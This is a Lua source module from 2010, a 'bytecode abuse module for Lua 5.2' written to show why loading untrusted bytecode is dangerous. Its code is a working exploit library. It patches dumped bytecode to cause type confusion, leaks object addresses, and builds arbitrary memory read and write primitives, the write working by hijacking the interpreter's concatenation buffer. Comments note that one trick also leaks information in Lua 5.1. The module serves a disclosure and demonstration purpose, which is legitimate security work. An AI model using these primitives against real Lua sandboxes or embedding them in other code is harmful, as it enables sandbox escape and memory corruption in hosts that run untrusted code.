-- Copyright (c) 2010 Peter Cawley -- -- Permission is hereby granted, free of charge, to any person obtaining a copy of this -- software and associated documentation files (the "Software"), to deal in the Software -- without restriction, including without limitation the rights to use, copy, modify, -- merge, publish, distribute, sublicense, and/or sell copies of the Software, and to -- permit persons to whom the Software is furnished to do so, subject to the following -- conditions: -- -- The above copyright notice and this permission notice shall be included in all copies -- or substantial portions of the Software. -- -- THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, -- INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A -- PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT -- HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF -- CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE -- OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. -- Name: Bytecode abuse module for Lua 5.2 -- Purpose: Provide a practical example (rather than theoretical examples) of why -- loading untrusted bytecode in Lua 5.2 is a serious security concern. -- Contact: corsix@corsix.org -- License: See top of file. -- Version: 0.1 -- History: 21-Aug-2010 :: Version 0.1 -- * Initial Release -- Exported functions: -- address = address_of(gc_object) -- buffer = make_buffer(size, initial_contents) -- address = pointer_add(address1, address2) -- address = pointer_subtract(address1, address2) -- val = read_tvalue(address) -- content = read_memory(address, size) -- write_tvalue(address, val) -- write_memory(address, content) -- content = pack_uint(num, size) -- num = unpack_int(content, offset) -- See each individual function for its full description. -- The following diagram shows how the most important parts of this module all fit -- together, along with where bytecode loading comes into the picture. -- -- write_memory -- || -- /#====================#| -- || || -- || /#============##===========#\ -- || || || || -- || \/ || \/ -- || read_tvalue || read_memory -- || || || || || || || -- || || \/ \/ \/ || || -- || || \#========##=======#/ || || -- || || || || || -- || || /#========-||-==========#/ || -- || || || || || -- || || || \/ || -- || || || write_tvalue || -- || || || || || -- || || || /#====##===========#\ || -- || || || || || || || -- \/ \/ \/ \/ || || || -- \===##=====##====/ || \/ || -- || || || make_buffer || -- || || || || || -- || \/ || \/ \/ -- || address_of || with_userdata -- || || || || -- \/ \/ \/ \/ -- ptr2num tonum_fn setlist_fn lowcall_fn -- || || || || -- || \/ \/ \/ -- || load malicious bytecode -- || || -- \#========#\ || -- || || -- \/ \/ -- load bytecode assert(_VERSION == "Lua 5.2", "This module only works with Lua 5.2") assert(not jit, "This module only works with the reference interpreter, not LuaJIT") -- The module table into which all exported functions will be placed. local _M = {} -- Make local copies of all the globals which are used. -- This allows stricter global-access checks within the module, and serves as a kind of -- dependency list (though various string functions are also called via method calls on -- string variables). local string_dump, type, assert, string_char, table_unpack, tonumber, loadin, pcall = string.dump, type, assert, string.char, table.unpack, tonumber, loadin, pcall local string_gsub, math_huge, pairs, collectgarbage, math_frexp, tostring, table_concat = string.gsub, math.huge, pairs, collectgarbage, math.frexp, tostring, table.concat local coroutine_running, math_max = coroutine.running, math.max do -- Prevent all access to globals (reads or writes to globals will throw an error) local _ENV = nil local t = {} -- Perform some introspection to get the endianness, and sizes of important data types local header = string_dump(function()end) local endian = header:byte(7) == 1 and "little" or "big" local sizeof_int = header:byte(8) local sizeof_pointer = header:byte(9) -- Assumption: sizeof(size_t) == sizeof(void*) local sizeof_instruction = header:byte(10) local sizeof_number = header:byte(11) local number_type = header:byte(12) == 1 and "int" or "float" -- Assumption: The actual value part of a TValue is at least large enough to store -- numbers and pointers. If this assumption is wrong, then something is very seriously -- broken. local tvalue_value_size = sizeof_number if tvalue_value_size < sizeof_pointer then tvalue_value_size = sizeof_pointer end -- Assumption: An entire TValue structure is at most twice twice the size of the value -- part of it. If this is not true, then insert a larger value here. local tvalue_size = tvalue_value_size * tvalue_value_size -- Create lookup table for turning opcode names into numbers -- Assumption: The opcode numbers start at 0 and follow the order specified in the -- following table. local opcode_map = {} for i, v in pairs{"MOVE", "LOADK", "LOADBOOL", "LOADNIL", "GETUPVAL", "GETTABUP", "GETTABLE", "SETTABUP", "SETUPVAL", "SETTABLE", "NEWTABLE", "SELF", "ADD", "SUB", "MUL", "DIV", "MOD", "POW", "UNM", "NOT", "LEN", "CONCAT", "JMP", "EQ", "LT", "LE", "TEST", "TESTSET", "CALL", "TAILCALL", "RETURN", "FORLOOP", "FORPREP", "TFORCALL", "SETLIST", "CLOSE", "CLOSURE", "VARARG", "TFORLOOP", "EXTRAARG"} do opcode_map[v] = i - 1 end -- Helper function to create a string whose byte representation is a VM instruction -- @param op The numeric opcode for the instruction (an integer in range [0, 39]), or -- a string containing the name of the opcode (e.g. "GetTabUp"). -- @param a The "A" parameter for the instruction (an integer in range [0, 255]). -- @param b The "B" or "sBx" parameter for the instruction ("B" parameters are -- integers in range [0, 511], sBx are in range [-131071, 131071]). -- @param c The "C" parameter for the instruction, or the string "sBx" if the "B" -- parameter is infact "sBx" ("C" has same range as "B"). local function make_instruction(op, a, b, c) -- Assumption: Instructions are laid out in the order OP, A, C, B, with the width -- of the fields being (respectively) 6, 8, 9, and 9 bits. -- We could try to deduce the width of the fields by dumping a function with known -- bytecode representation, but if the instruction widths have changed, then other -- more drastic changes have probably also been made to instruction formats. if type(op) == "string" then op = assert(opcode_map[op:upper()], "Unrecognised opcode") end if c == "sBx" then -- Apply sBx bias to turn sBx into Bx b = b + (2^18-1)/2 - 0.5 -- Split Bx into the B and C fields c = b % 2^9 b = (b - c) / 2^9 end -- Construct the values of the bytes of the instruction local low_a = a % 4 local low_b = b % 2 local low_c = c % 4 -- bit0 bit7 local b1 = op + low_a * 2^6 -- [OPOPOP|AA] local b2 = ((a - low_a) / 4) + low_c * 2^6 -- [AAAAAA|CC] local b3 = ((c - low_c) / 4) + low_b * 2^7 -- [CCCCCCC|B] local b4 = ((b - low_b) / 2) -- [BBBBBBBBB] -- Pack the bytes into a string and pad them local inst if endian == "little" then inst = string_char(b1, b2, b3, b4) inst = inst .. ("\0"):rep(sizeof_instruction - #inst) else inst = string_char(b4, b3, b2, b1) inst = ("\0"):rep(sizeof_instruction - #inst) .. inst end return inst end -- Helper function to replace one instruction with another in the string -- representation of a function. -- @param haystack The result of a call to string.dump containing the string -- representation of a function. -- @param needle An array containing the arguments for a call to make_instruction, the -- result of which is the instruction to be replaced. -- @param repl An array containing the arguments for a call to make_instruction, the -- result of which is the instruction to replace "needle" with. -- @return A string containing a representation of a function, which is the same as -- "haystack", but with the 1st occurance of "needle" replaced by "repl". local function replace_instruction(haystack, needle, repl) needle = make_instruction(table_unpack(needle)) repl = make_instruction(table_unpack(repl )) -- NB: Using gsub would require that we escape anything magic in needle and repl local idx = haystack:find(needle, 1, true) return haystack:sub(1, idx-1) .. repl .. haystack:sub(idx + sizeof_instruction, -1) end -- Construct a helper function which performs a SETLIST VM instruction. -- The resulting function will perform t[1] = k, and do so under the assumption that -- t is a table (NB: Lua 5.1 doesn't make this assumption). -- If t is not a table, then this leads to all sorts of fun. In particular, if t is -- a number, then the binary representation of the number is interpreted as a pointer -- to a Table structure, and if t is a different GC object, then the pointer to its -- structure is treated as a pointer to a Table structure. -- Provided that the "sizearray" field of the resulting Table structure is strictly -- positive, then a TValue is written to the address specified in the "array" field of -- the resulting Table. -- @param tt A value to be interpreted as a table. -- @param k A value to be written to tt[1]. local setlist_fn setlist_fn = string_dump(function(tt, k) tt = {k} do return end t = nil -- 5.2-work4 bug workaround: loadin requires that there be an upvalue end) -- Replace "NEWTABLE 2 1 0" with "MOVE 2 0", so that the SETLIST operates on the "t" -- parameter rather than on a new table. setlist_fn = replace_instruction(setlist_fn, {"NewTable", 2, 1, 0}, {"Move" , 2, 0, 0}) setlist_fn = assert(loadin(t, setlist_fn)) -- Construct a helper function which changes the type of a value to be a number, -- without changing anything else in the value. -- If we can subsequently dump the binary representation of the number, then this -- provides us with a way of doing what lua_topointer does. In particular, this allows -- us to obtain the addresses of strings, which is convenient, as we can construct -- strings with whatever contents we want. Note that this bytecode abuse passes right -- through 5.1's bytecode verifier, so this trick can also be used for information -- leakage attacks using Lua 5.1. -- @param a The value to be reinterpreted as a number. -- @return A copy of the parameter, with the type-tag field changed to that of a -- number, and everything else unchanged. local tonum_fn tonum_fn = string_dump(function(a) for i = a, -math_huge, 0 do return i end end) -- Replace "FORPREP 1 1" with "JMP 1", so that the parameters are not validated as -- numbers. tonum_fn = replace_instruction(tonum_fn, {"ForPrep", 1, 1, "sBx"}, {"Jmp" , 0, 1, "sBx"}) tonum_fn = assert(loadin({math_huge = math_huge}, tonum_fn)) -- Helper function to return the in-memory binary representation of a number. -- @param n A number to return the in-memory binary representation of. -- @return A string whose byte representation matches the byte representation of the -- "n" parameter. Note that this may be longer than the length of a pointer. -- @throw An error is thrown if the given number is NaN. local function num2ptrx(n) -- Assumption: Lua number type is 64-bit (double-precision) IEEE754 floating point. -- We can check the actual number type by inspecting the bytecode header, but this -- is the most common number type, so it'll do for now. assert(number_type == "float" and sizeof_number == 8, "num2ptrx only implemented for double-precision floating point numbers") local top_bit = 0 if 1/n == -math_huge -- reliable way of detecting negative zero or n < 0 then n = -n top_bit = 1 end local bytes = {0, 0, 0, 0, 0, 0} if n == math_huge then -- Infinity is a special case. bytes[7] = 0xF0 bytes[8] = 0x7F + top_bit * 0x80 elseif n == 0 then -- Zero is another special case bytes[7] = 0x00 bytes[8] = top_bit * 0x80 else -- Bit patterns x11111111111xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx -- are all NaN values (with the exception of all the second group of bits being -- zero, which is infinity), which it is impossible to do anything with. We just -- have to hope that we do not hit these values. assert(n == n, "Unable to determine the binary representation of NaN values") -- TODO: Denormalised numbers local exponent_width = 11 local mantissa_width = 52 local m, e = math_frexp(n) e = e + 2^(exponent_width - 1) - 2 + top_bit * 2^exponent_width m = (m - 0.5) * 2^(mantissa_width + 1) for i = 1, 8 do bytes[i] = m % 256 m = (m - bytes[i]) / 256 if i == 2 then -- Having taken 16 bits of precision out of the mantissa, there is now room -- for inserting the exponent without losing any precision. m = m + e * 2^(mantissa_width - 16) end end end local s = string_char(table_unpack(bytes)) if endian == "big" then s = s:reverse() end return s end -- Helper function to perform a call to another function, but with the garbage -- collector disabled for the duration of the call. This can be useful if the called -- function places the Lua VM temporarily in a state where there are invalid values -- around, as traversal of these by the GC could lead to problems. -- @param f A function to be called with the garbage collector disabled. -- @param ... Arguments to pass to "f". -- @return The return value(s) of "f". local without_gc do local function enable_gc(x, ...) collectgarbage "restart" if x then return ... else assert(x, ...) end end without_gc = function(f, ...) local is_running = collectgarbage "isrunning" if not is_running then return f(...) else collectgarbage "stop" return enable_gc(pcall(f, ...)) end end end -- Helper function to create a userdata with some initial contents, pass said userdata -- to another function, and then return the final contents of said userdata. -- @param size The minimum size (in bytes) of the userdata to pass to "f". -- @param f A function (or other callable value), which will be called with a single -- userdata parameter, whose size will be at least "size" bytes. -- @param init A string whose contents will be present at the head of the userdata -- when "f" is called. -- @return A string representation of the contents of the userdata passed to "f", -- after the call to "f" completed. local with_userdata do -- Construct a helper function which allows us to call a function, and subsequently -- access its locals / stack slots (provided that said function calls us back, as -- obviously said function needs to be running for it to have locals). -- See http://article.gmane.org/gmane.comp.lang.lua.general/50879/ for the initial -- report of this bytecode abuse in Lua 5.1.4. -- @param g A function which will be called with a single parameter. This parameter, -- when called from within "f", will return the values of (some of the) -- locals / stack slots of "f". -- @param f A function to be called, whose locals / stack slots will be availble for -- reading. -- @param x, y, z Parameters to be passed to "f". -- @return The first return value of the call to "f". local lowcaller_fn lowcaller_fn = string_dump(function(g, f, x, y, z) do local l1, l2, l3, l4, l5, l6, l7, l8 g(function() return l1, l2, l3, l4, l5, l6, l7, l8 end) f(x, y, z) return f end t = nil -- 5.2-work4 bug workaround: loadin requires that there be an upvalue end) -- Replace "CALL 13 4 1" with "CALL 1 4 2" so that the call to "f" happens at the -- bottom of the stack, causing l1 through l8 to be used as locals / stack slots for -- the call, and then causing the return value to overwrite f. lowcaller_fn = replace_instruction(lowcaller_fn, {"Call", 13, 4, 1}, {"Call", 1, 4, 2}) lowcaller_fn = assert(loadin(t, lowcaller_fn)) local min_userdata_size with_userdata = function(size, f, init) init = init or "" -- The userdata which we end up creating is made by the auxiliary library buffer -- system. Unfortunately, this system only allocates userdatas after a certain -- size threshold, which we determine through an exponential search done in the -- first call to with_userdata. if not min_userdata_size then local found_ud = false local found_f = function() found_ud = true end min_userdata_size = 1 repeat min_userdata_size = min_userdata_size * 2 with_userdata(min_userdata_size, found_f) until found_ud end if size < min_userdata_size then size = min_userdata_size end -- We use the size for string.rep, which (for large N) works faster if you call it -- multiple times with values which multiply together to the desired N. As we -- don't care if the size is larger than what we want, exact factorisation isn't -- needed, and we can just do the following. size = size - #init if size <= 0 then size = 0 else size = size ^ 0.5 -- sqrt size = size - (size % 1) + 1 -- ceil end local read_locals return lowcaller_fn(function(...) read_locals = ... end, string_gsub, "12", ".", function(s) if s == "1" then -- First call: ensure that the userdata is large enough, and has the correct -- initial contents. return init .. ("\0"):rep(size):rep(size) else -- Second call: find the userdata, and pass it to f. for _, v in pairs{read_locals()} do if type(v) == "userdata" then f(v) break end end return "" end end) end end -- Helper function to take a string of bytes and return a number whose in-memory -- representation is that string of bytes (obviously only possible when the length of -- the string is less than or equal to the in-memory length of a number). -- @param p A string of bytes to be converted. The length of this string cannot be -- greater than the size of a number (typically 8 bytes, sometimes 4). -- @return A number whose in-memory representation is the same as that of "p". local ptr2num do -- Some number whose binary representation should only occur once in a dumped -- function. local magic_k = 31416 -- Dump a function which returns the above constant, and identify where the constant -- is in the resulting string. local k_fn = string_dump(loadin(t, "return " .. magic_k)) magic_k = num2ptrx(magic_k) local idx = k_fn:find(magic_k, 1, true) -- Perform the conversion which we want by replacing the constant with the value to -- be converted, then load and call the resulting code. ptr2num = function(p) -- Assumption: Generally whenever this is called, there is an assumption that -- sizeof(void*) <= sizeof(lua_Number) assert(type(p) == "string") assert(#p <= #magic_k, "Pointer too big to convert to number") -- NB: Don't use .. operator, as ptr2num can be called while the concatenation -- buffer is being abused for other things. return loadin(t, table_concat{k_fn:sub(1, idx - 1), p, ("\0"):rep(#magic_k - #p), k_fn:sub(idx + #magic_k, -1)})() end end -- Create a mutable buffer with a given size and/or initial contents. -- @param size The minimum size (in bytes) of the newly created userdata (optional). -- @param initial_contents A string whose bytes will be present at the head of the -- resulting userdata (optional). -- @return A newly created userdata. function _M.make_buffer(size, initial_contents) local ud if type(size) == "string" then initial_contents = size size = #size end with_userdata(size or 0, function(...) ud = ... end, initial_contents) return ud end -- Often we know a memory address and want to write to it multiple times. This helper -- function makes functions which write to a specific memory address. -- @param address A string whose byte representation matches that of a native pointer. -- @return A function, which when called with a single value, will write that value as -- a TValue structure to the previously specified memory address. local function make_tvalue_writer(address) -- To perform the write, we need to have a Table structure with suitable "array" and -- "sizearray" fields. -- Assumption: A Table structure is 8 pointers wide, with three of those pointers -- coming before the "array" pointer. -- Assumption: Signed integers are represented using two's complement and the -- character code for space doesn't have MSB set (hence a string of spaces, -- interpreted as an int, is strictly positive). local t = (" "):rep(sizeof_pointer * 3) .. address .. (" "):rep(sizeof_pointer * 4) -- We could use "t" as our table, but that would require that we get the address of -- the string. This can be done, but getting the address of a userdata is more -- reliable. In either case, the string or userdata cannot be used as the table -- directly, as then there would be an awkward header on the front of the data, and -- the "array" field of a Table would land within the header rather than within -- our data. local ud = _M.make_buffer(t) local addr = ptr2num(_M.address_of(ud)) return function(val) -- Note that ud has to be kept alive, which we do by passing it as a parameter -- (which is subsequently ignored). setlist_fn(addr, val, ud) end end -- Write a Lua TValue structure at a given location. -- @param address A string whose byte representation matches that of a native pointer -- to the address to be written to. -- @param val A Lua value which be written, as TValue structure, to the given address. function _M.write_tvalue(address, val) make_tvalue_writer(address)(val) end -- Takes a userdata/table/function/thread and returns a string whose contents is a -- native pointer to the object. Can also return the address of strings, but this is -- not possible for all strings, and hence cannot be used reliably. -- @param gc_object A garbage collectable object (userdata, thread, function, table, -- or string) to be converted into a pointer. -- @return A string whose byte representation matches that of a pointer to the -- specified object. For userdata, this is a pointer to the data of the -- userdata. For other types, it is a pointer to an instance of Lua's internal -- structure for the type. function _M.address_of(gc_object) local typ = type(gc_object) if typ == "userdata" or typ == "table" or typ == "function" or typ == "thread" then -- Most garbage-collectable objects are simple, as tostring gives you the pointer. -- The only step required after that is to reformat the pointer as a string -- containing an array of bytes. gc_object = tostring(gc_object):sub(-sizeof_pointer*2, -1):gsub("..", function(x) return string_char(tonumber(x, 16)) end) if endian == "little" then gc_object = gc_object:reverse() end return gc_object else assert(typ == "string", "Only GC objects have addresses") -- Strings are the difficult case. Obviously tostring() will give us back the -- string itself, rather than the address of it. Hence we have to fall back to the -- much less reliable route of changing the type-tag field to that of a number, -- and then trying to determine the binary representation of the number, which can -- fail if the pointer to the string comes out as a NaN value when reinterpreted -- as a lua_Number. gc_object = tonum_fn(gc_object) return num2ptrx(gc_object):sub(1, sizeof_pointer) end end do -- Helper function to normalise pointer arguments. -- @param p A string whose byte representation is a native pointer, or a number to -- be used as an offset from (char*)NULL, or a GC object (other than a -- string) to take the address of, or nil for the NULL pointer. -- @return A string whose byte representation is a native pointer. local function checkptr(p) local typ = type(p) if typ == "number" then if p < 0 then -- Assumption: Two's complement is used for representing negative numbers p = p + 2^sizeof_pointer end assert(p >= 0, "NaN cannot be used as a pointer") local bytes = {} local i = 1 while p ~= 0 do local byte = p % 256 bytes[i] = byte p = (p - byte) / 256 i = i + 1 end p = string_char(table_unpack(bytes)) p = p .. ("\0"):rep(sizeof_pointer - #p) if endian == "big" then p = p:reverse() end return p elseif typ == "nil" then return ("\0"):rep(sizeof_pointer) elseif typ ~= "string" then return _M.address_of(p) else return p end end -- Takes two pointers and returns their sum. -- @param p1 A pointer. This should be either a number representing an address, or a -- string whose byte representation is a native pointer. -- @param p2 As "p1". -- @return A string whose byte representation is the sum of "p1" and "p2". function _M.pointer_add(p1, p2) p1 = checkptr(p1) p2 = checkptr(p2) if endian == "big" then p1 = p1:reverse() p2 = p2:reverse() end local bytes1 = {p1:byte(1, -1)} local bytes2 = {p2:byte(1, -1)} for i = 1, #bytes1 do if bytes1[i] + bytes2[i] >= 256 then bytes2[i + 1] = bytes2[i + 1] + 1 end bytes1[i] = (bytes1[i] + bytes2[i]) % 256 end p1 = string_char(table_unpack(bytes1)) if endian == "big" then p1 = p1:reverse() end return p1 end -- Takes two pointers and returns the pointer obtained by subtracting the second -- from the first. -- @param p1 A pointer. This should be either a number representing an address, or a -- string whose byte representation is a native pointer. -- @param p2 As "p1". -- @return A string whose byte representation is "p1" minus "p2". function _M.pointer_subtract(p1, p2) p1 = checkptr(p1) p2 = checkptr(p2) if endian == "big" then p1 = p1:reverse() p2 = p2:reverse() end local bytes1 = {p1:byte(1, -1)} local bytes2 = {p2:byte(1, -1)} for i = 1, #bytes1 do if bytes1[i] < bytes2[i] then bytes2[i + 1] = bytes2[i + 1] + 1 end bytes1[i] = (bytes1[i] - bytes2[i]) % 256 end p1 = string_char(table_unpack(bytes1)) if endian == "big" then p1 = p1:reverse() end return p1 end end do -- For read operations, we need a table with at least one array slot. Unfortunately, -- this table will never get freed, as we corrupt it too much, and hence have to -- remove it from the garbage collector's control. local read_mem_t = {0} -- Change the type field of the newly created table so that the garbage collector -- sees it as nil. Note that the reference that we have to the table still thinks -- that it is a table, so we can still read from it. local read_mem_type = _M.pointer_add(_M.address_of(read_mem_t), sizeof_pointer) _M.write_tvalue(read_mem_type, ptr2num(("\0"):rep(sizeof_number))) local set_read_mem_target = make_tvalue_writer(_M.pointer_add(read_mem_type, sizeof_pointer * 2)) -- Read an arbitrary block of memory in the address space of the Lua state. -- @param address The address in memory at which to start reading. This should be -- either a number representing an address, or a string whose -- byte representation is a native pointer. -- @param size The number of bytes to read. Note that up to sizeof(TValue) more -- bytes may be read. -- @return A string whose contents is byte-for-byte identical to the contents of the -- memory range [address, address+size). function _M.read_memory(address, size) return without_gc(with_userdata, size + tvalue_size, function(ud) local ud_addr = _M.address_of(ud) for i = 0, size - 1, tvalue_value_size do set_read_mem_target(ptr2num(_M.pointer_add(address, i))) local val = read_mem_t[1] val = nil -- Clears the type-tag field, leaves value intact. This makes the -- value safe for calls like luaC_barrierback. _M.write_tvalue(_M.pointer_add(ud_addr, i), val) end end):sub(1, size) end -- Read a single Lua value in the address space of the Lua state. -- @param address The address in memory at which to read a Lua TValue structure. -- @return The value present at the given address. If this is not a valid Lua value, -- then operations on it will likely fail, and the GC will likely explode if -- it tries to do anything with it. function _M.read_tvalue(address) set_read_mem_target(ptr2num(address)) return read_mem_t[1] end end -- Convert an integer which is stored in native machine format as bytes in a string -- into a number. -- @param str A string whose byte sequence contains an integer in native machine -- format. -- @param offset (Optional) The byte offset within str at which to start reading the -- integer. Defaults to 0 if not given. function _M.unpack_int(str, offset) offset = offset or 0 str = str:sub(offset + 1, offset + sizeof_int) if endian == "big" then str = str:reverse() end local bytes = {str:byte(1, -1)} local n = 0 local mul = 1 for i = 1, sizeof_int do n = n + mul * bytes[i] mul = mul * 256 end if n >= (mul / 2) then n = n - mul end return n end -- Convert a number which is a non-negative integer into a string whose byte -- representation is the given integer in the native machine format. -- @param num A number which is non-negative and has no fractional part. -- @param size (Optional) The number of bytes to return. Defaults to sizeof(int). -- @return A string whose byte representation is "num", in the native machine format -- for integers. function _M.pack_uint(num, size) size = size or sizeof_int local bytes = {} for i = 1, size do local byte = num % 256 bytes[i] = byte num = (num - byte) / 256 end local s = string_char(table_unpack(bytes)) if endian == "big" then s = s:reverse() end return s end do -- Assumption: a lua_State has a pointer to a global_State, and there are three -- pointer-sized fields in a lua_State prior to this pointer. local global_state_addr = _M.read_memory(_M.pointer_add(_M.address_of( coroutine_running()), sizeof_pointer * 3), sizeof_pointer) local concat_mbuff_addr_buffer local concat_mbuff_addr_n local concat_mbuff_addr_buffsize without_gc(function() -- Assumption: global_State stores the value of the GC pause parameter as an -- integer field. -- Find the pause field by setting it to a known value and scanning for it. local new_pause = 42 local old_pause = collectgarbage("setpause", new_pause) local pause_addr = global_state_addr while true do if _M.unpack_int(_M.read_memory(pause_addr, sizeof_int)) == new_pause then -- Check that we really have found the field by changing it and ensuring that -- the pointer we have also changes. This is done a few times. local is_good = true for i = 1, 5 do new_pause = new_pause * 11 collectgarbage("setpause", new_pause) if _M.unpack_int(_M.read_memory(pause_addr, sizeof_int)) ~= new_pause then is_good = false break end end if is_good then break end end pause_addr = _M.pointer_add(pause_addr, sizeof_int) end collectgarbage("setpause", old_pause) -- Assumption: Immediately prior to the pause field is an Mbuffer structure used -- during string concatenations. concat_mbuff_addr_buffer = _M.pointer_subtract(pause_addr, sizeof_pointer * 3) concat_mbuff_addr_n = _M.pointer_add(concat_mbuff_addr_buffer, sizeof_pointer) concat_mbuff_addr_buffsize = _M.pointer_add(concat_mbuff_addr_n, sizeof_pointer) end) local concat_mbuff_set_buffer = make_tvalue_writer(concat_mbuff_addr_buffer) local concat_mbuff_set_n = make_tvalue_writer(concat_mbuff_addr_n) local concat_mbuff_set_buffsize = make_tvalue_writer(concat_mbuff_addr_buffsize) local function do_write_memory(address, content, buffsize) -- Throughout this function, we have to take care not to call luaV_concat, -- except calling it once to perform the intended memory write. This means -- avoiding any explicit concatenations, and avoiding other functions which can -- end up calling luaV_concat, like for example address_of. -- As we'll be overwriting the Mbuffer fields, we need to save them so that they -- can be restored. local old_mbuff_buffer = _M.read_tvalue(concat_mbuff_addr_buffer) old_mbuff_buffer = nil -- Clears the type-tag field, leaves value intact. This -- makes the value safe for calls like luaC_barrierback. local old_mbuff_n = _M.read_tvalue(concat_mbuff_addr_n) old_mbuff_n = nil -- ditto. local old_mbuff_buffsize = _M.read_tvalue(concat_mbuff_addr_buffsize) old_mbuff_buffsize = nil -- ditto. -- Overwriting the Mbuffer fields will probably overwrite the fields immediately -- after it in the global_State, so save them too. local old_pause = collectgarbage("setpause", 1) local old_stepmul = collectgarbage("setstepmul", 1) -- Set the buffer to be used for concatenation to be the memory we want to write -- to. concat_mbuff_set_buffer(address) concat_mbuff_set_buffsize(buffsize) -- Perform a concatention whose result is the bytes we want to write. content = content:sub(1, -2) .. content:sub(-1, -1) -- Restore the fields of the global_State. concat_mbuff_set_buffer(old_mbuff_buffer) concat_mbuff_set_n(old_mbuff_n) concat_mbuff_set_buffsize(old_mbuff_buffsize) collectgarbage("setpause", old_pause) collectgarbage("setstepmul", old_stepmul) end -- Write an arbitrary block of memory in the address space of the Lua state. -- @param address The address in memory at which to start writing. This dhould be -- either a number representing an address, or a string whose byte -- representation is a native pointer. -- @param content A string whose contents should be written, byte-for-byte, to the -- memory range [address, address+#content). This string cannot have -- length one; to write individual bytes, you must read an adjacent -- byte and then write two bytes. function _M.write_memory(address, content) if #content == 0 then -- Nothing to do return end assert(#content ~= 1, "Cannot write single bytes") local buffsize = ptr2num(_M.pack_uint(#content, sizeof_pointer)) without_gc(do_write_memory, ptr2num(address), content, buffsize) end end end return _M